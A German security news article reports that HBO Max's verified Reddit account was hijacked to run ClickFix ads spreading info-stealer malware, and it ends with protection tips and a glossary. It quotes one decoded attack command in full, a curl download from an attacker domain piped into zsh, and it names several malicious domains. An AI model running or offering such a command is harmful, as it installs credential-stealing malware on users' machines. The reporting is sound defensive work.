HBO Max Reddit-Konto gehackt, um ClickFix-Malware zu verbreiten

HBO Max Reddit-Konto gehackt, um ClickFix-Malware zu verbreiten

Hacker haben das verifizierte Reddit-Konto von HBO Max übernommen und innerhalb von zwei Tagen 108 ClickFix-Anzeigen geschaltet, um Windows- und macOS-Nutzer dazu zu bringen, Befehle einzufügen, die Info-Stealer-Malware installieren.

Cyberkriminelle haben das offizielle HBO Max-Konto auf Reddit übernommen und es genutzt, um bösartige Werbeanzeigen zu veröffentlichen, die Informationen stehlende Malware auf Windows- und macOS-Computer brachten. Sicherheitsforscher von Hudson Rock und ADAMnetworks analysierten die Kampagne und berichteten, dass das verifizierte Konto u/hbomax gekapert und genutzt wurde, um innerhalb von etwa 48 Stunden 108 bösartige Anzeigen zu schalten. Die Anzeigen nutzten eine Social-Engineering-Technik namens ClickFix, bei der Opfer dazu verleitet werden, Befehle in integrierte Systemwerkzeuge wie Windows Run, PowerShell oder das macOS-Terminal zu kopieren und einzufügen. Die Befehle werden als Möglichkeit präsentiert, einen Fehler zu beheben, ein CAPTCHA abzuschließen oder legitime Software zu installieren, führen aber tatsächlich vom Angreifer kontrollierten Code aus, der Malware herunterlädt und ausführt.

Die ClickFix-Taktik ist immer häufiger geworden, weil das Ziel die schädliche Aktion freiwillig mit Werkzeugen ausführt, die Teil des Betriebssystems sind. Dadurch können einige Browserschutz- und Sicherheitssoftware umgangen werden, die auf die Erkennung bösartiger Downloads ausgerichtet ist, da keine schädliche Datei geliefert wird, bis der Befehl ausgeführt wird und die Nutzlast von einem entfernten Server abruft. In diesem Vorfall gaben sich einige der Anzeigen als Werbung für den Streamingdienst HBO Max aus, während andere gefälschte KI-Tools, Entwicklersoftware und macOS-Dienstprogramme bewarben. Hudson Rock und ADAMnetworks brachten die Aktivität mit einer größeren Operation in Verbindung, die sie PasteSwitch nennen. Diese zielt sowohl auf Windows- als auch auf macOS-Rechner und wurde zur Verbreitung von Info-Stealern, Loadern, Kryptowährungs-Clippern und gefälschten Kryptowährungs-Wallet-Anwendungen eingesetzt. Der Name PasteSwitch bezieht sich darauf, wie Opfer vom Angreifer bereitgestellte Befehle in ihre Systeme einfügen, während die Backend-Infrastruktur je nach Besucher zwischen Kampagnen, Plattformen, Nutzlasten und Krypto-Diebstahlmethoden wechselt.

Die Kampagne wurde zuerst bemerkt, als ein Reddit-Nutzer eine Anzeige entdeckte, die vom verifizierten HBO Max-Konto zu stammen schien und für eine scheinbar native HBO Max-Anwendung für macOS warb. Der Nutzer beschrieb, u/hbomax als Autor der Anzeige gesehen zu haben, und war interessiert, weil das Konto viele Male in offiziellen HBO Max-Subreddits gepostet hatte. Nach dem Klick auf die Anzeige wurden Besucher auf eine überzeugende gefälschte HBO Max-Website weitergeleitet, darunter eine unter hbomaxx[.]us, die angeblich die App zum Download anbot. Das Drücken der Download-Schaltfläche lieferte jedoch keinen Installer. Stattdessen zeigte die Website Anweisungen, das macOS-Terminal zu öffnen und einen Befehl einzufügen, um die Software zu installieren. BleepingComputer untersuchte einen der macOS-Befehle, der Base64-Kodierung verwendete, um seinen wahren Inhalt zu verbergen. Nach der Dekodierung lautete der Befehl: export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh. Hudson Rock identifizierte ember-bridge[.]com als Infrastruktur, die im September für die Malware-Lieferung in der PasteSwitch-Operation genutzt wurde.

Auf macOS lieferte der Angriff eine Malware-Familie namens MacSync, die laut Hudson Rock gespeicherte Browser-Anmeldeinformationen, Firefox-Profile, Telegram-Daten, Apple Notes und macOS-Passwörter stiehlt. Eine zweite Infektionskette verwendete eine Komponente namens AMOS helper, die Persistenz herstellt, indem sie ein Verzeichnis namens .com.apple.accountsd erstellt. Einmal eingerichtet, kann die Malware das infizierte System bei vom Angreifer kontrollierten Servern registrieren, um zusätzliche Aufgaben zu erhalten. Dieselbe Werbekampagne verbreitete auch gefälschte Ledger-, Trezor Suite- und Exodus-Kryptowährungs-Wallet-Anwendungen, die darauf abzielten, die Wiederherstellungsphrasen der Opfer zu stehlen – die geheimen Wörter, die den Zugriff auf eine Krypto-Wallet wiederherstellen. Unter Windows zeigte PasteSwitch Anweisungen, die Opfer dazu brachten, Befehle mit mshta und PowerShell auszuführen. Hudson Rock beschrieb eine Windows-Angriffskette, die eine MP3/HTA-Polyglot-Datei verwendete, um eine geplante Aufgabe zu erstellen, 32-Bit-PowerShell zu starten, die Microsoft Antimalware Scan Interface zu deaktivieren und opferspezifische Infrastruktur basierend auf Computernamen und Benutzernamen zu generieren. Spätere Phasen stützten sich auf obfuskierten PowerShell- und Shellcode, um einen Stealer namens Amatera direkt in den Speicher zu laden, ohne die endgültige Nutzlast auf der Festplatte zu speichern.

Die HBO Max-Anzeige war Teil einer viel größeren Werbekampagne, die über das kompromittierte Reddit-Konto betrieben wurde. Forscher identifizierten 40 Anzeigen, die auf hbomaxx[.]app verwiesen, 36, die die gefälschte KI- und Entwicklerseite codex-craft[.]com bewarben, 15, die für apple.clean-disk-guide[.]com warben, 11, die auf code-desktop[.]com zeigten, und sechs, die für hbomax-macos[.]com warben. Dadurch konnten die Kriminellen weit mehr als nur HBO Max-Nutzer anvisieren und auch Entwickler sowie Personen erreichen, die nach KI-Software und Systemdienstprogrammen suchten. Nachdem die bösartigen Anzeigen gemeldet wurden, pausierte ein Reddit-Administrator sie und meldete sie den Sicherheits- und Schutzteams von Reddit. Es bleibt unklar, wie die Angreifer Zugriff auf das HBO Max-Reddit-Konto erlangten oder ob andere HBO- oder Warner Bros. Discovery-Konten oder -Systeme betroffen waren. BleepingComputer kontaktierte HBO und Warner Bros. Discovery mit Fragen zu dem Vorfall, erhielt jedoch keine Antwort.

Für Website-Betreiber, Unternehmen und alltägliche Internetnutzer ist dieser Vorfall eine Erinnerung daran, dass ein verifiziertes Abzeichen oder ein bekannter Markenname eine Online-Anzeige oder einen Download-Link nicht sicher macht. ClickFix-Angriffe sind besonders gefährlich, weil sie das Opfer auffordern, einen Befehl manuell auszuführen, wodurch die Aktion außerhalb des normalen Dateiscan-Pfads liegt, den viele Endpoint-Schutzlösungen verwenden. Die stärkste Verteidigung besteht darin, niemals einen Befehl von einer Website in Terminal, PowerShell oder den Ausführen-Dialog einzufügen, es sei denn, Sie verstehen genau, was er tut, und haben die Quelle unabhängig bestätigt. Die Zusammenarbeit mit einem sicherheitsorientierten Infrastruktur- und Beratungspartner wie AEU-I kann Unternehmen dabei helfen, Endpoint- und Netzwerkkontrollen gegen Paste-and-Run-Angriffe zu überprüfen, aber kein technischer Dienst ersetzt die Notwendigkeit von Benutzerbewusstsein und Verifizierung vor der Ausführung von Befehlen.

So schützen Sie sich

  1. Kopieren Sie niemals einen Befehl von einer Website und fügen Sie ihn in die Kommandozeile Ihres Computers ein, egal wie offiziell die Seite aussieht.
  2. Wenn eine Anzeige oder Website Ihnen sagt, Sie sollen einen Fehler beheben oder ein CAPTCHA bestätigen, indem Sie Text einfügen, schließen Sie die Seite und gehen Sie direkt zur offiziellen Website, indem Sie die Adresse selbst eingeben.
  3. Bevor Sie eine App herunterladen, prüfen Sie die Webadresse sorgfältig und achten Sie auf kleine Tippfehler oder zusätzliche Buchstaben wie hbomaxx.us statt hbomax.com.
  4. Halten Sie Ihr Betriebssystem und Ihren Browser auf dem neuesten Stand und verwenden Sie ein Sicherheitstool, das bekannte bösartige Websites blockieren kann.
  5. Wenn Sie eine Kryptowährungs-Wallet verwenden, geben Sie Ihre Wiederherstellungsphrase niemals in eine App oder Website ein, es sei denn, Sie sind absolut sicher, dass Sie die offizielle Wallet installiert haben.
  6. Melden Sie verdächtige Anzeigen oder Beiträge auf sozialen Plattformen über die Meldefunktion der Plattform.

Begriffe Erklärt

  • ClickFix Eine Betrugstechnik, bei der Kriminelle Menschen dazu bringen, einen Befehl auf ihrem eigenen Computer einzufügen und auszuführen, der Malware installiert, anstatt ein Problem zu beheben.
  • Malware Kurz für bösartige Software, ein Programm, das darauf ausgelegt ist, einem Gerät zu schaden, es zu übernehmen oder Daten zu stehlen.
  • Base64 Eine Methode, Text oder Daten in eine Ansammlung von Buchstaben, Zahlen und Symbolen umzuwandeln, damit es für Menschen schwieriger zu erkennen ist, was wirklich darin steht.
  • PowerShell Ein in Windows integriertes Werkzeug, mit dem Benutzer Befehle ausführen können, das oft von Hackern genutzt wird, weil es vom System als vertrauenswürdig eingestuft wird.
  • Cryptocurrency wallet Eine Software oder Hardware, die die geheimen Schlüssel speichert, die für die Nutzung von digitalem Geld wie Bitcoin benötigt werden.
  • Info-stealer Eine Art von Malware, die gespeicherte Passwörter, Cookies und andere private Daten von einem infizierten Computer sammelt.

Verwandte AEU-Dienste

  • AEU-I IT- und Sicherheitsberatung